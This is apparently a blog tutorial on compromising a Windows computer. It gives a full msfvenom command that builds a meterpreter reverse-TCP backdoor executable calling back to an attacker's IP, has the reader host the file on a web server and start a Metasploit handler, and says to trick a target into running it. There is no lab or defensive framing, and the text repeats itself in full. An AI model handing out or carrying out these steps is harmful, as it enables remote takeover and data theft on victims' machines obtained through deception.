In this tutorial we are going to learn how to hack a windows operating system with malware.
Create a windows malware using msfvenom. Execute the following command to create a malware that can run on a windows computer and act as a backdoor.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker’s IP> LPORT=<attacker’s port> --platform windows -f exe -o /var/www/html/<filename.exe>
The malware file is saved on to web root of attacker’s kali linux machine.
Start Apache server, to enable targets to download this malware
Start Metasploit Framework
Let us use multi handler exploit to handle reverse connections. Execute the following command.
Make sure to use the same payload that was used during malware creation using msfvenom and configure payload options.
Execute the exploit command, which starts the handler.
Trick the target to download and execute the malicious file (.exe).
Soon after target executes the malware file, the attacker will gain a meterpreter session from where he can control target computer (refer chapter 6 for meterpreter usage).
After getting the meterpreter session then by executing the meterpreter commands you can know the information of victim's computer.
Happy Hacking:)
Create a windows malware using msfvenom. Execute the following command to create a malware that can run on a windows computer and act as a backdoor.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker’s IP> LPORT=<attacker’s port> --platform windows -f exe -o /var/www/html/<filename.exe>
The malware file is saved on to web root of attacker’s kali linux machine.
Start Apache server, to enable targets to download this malware
Start Metasploit Framework
Let us use multi handler exploit to handle reverse connections. Execute the following command.
Make sure to use the same payload that was used during malware creation using msfvenom and configure payload options.
Execute the exploit command, which starts the handler.
Trick the target to download and execute the malicious file (.exe).
Soon after target executes the malware file, the attacker will gain a meterpreter session from where he can control target computer (refer chapter 6 for meterpreter usage).
After getting the meterpreter session then by executing the meterpreter commands you can know the information of victim's computer.
Happy Hacking:)
No comments:
Post a Comment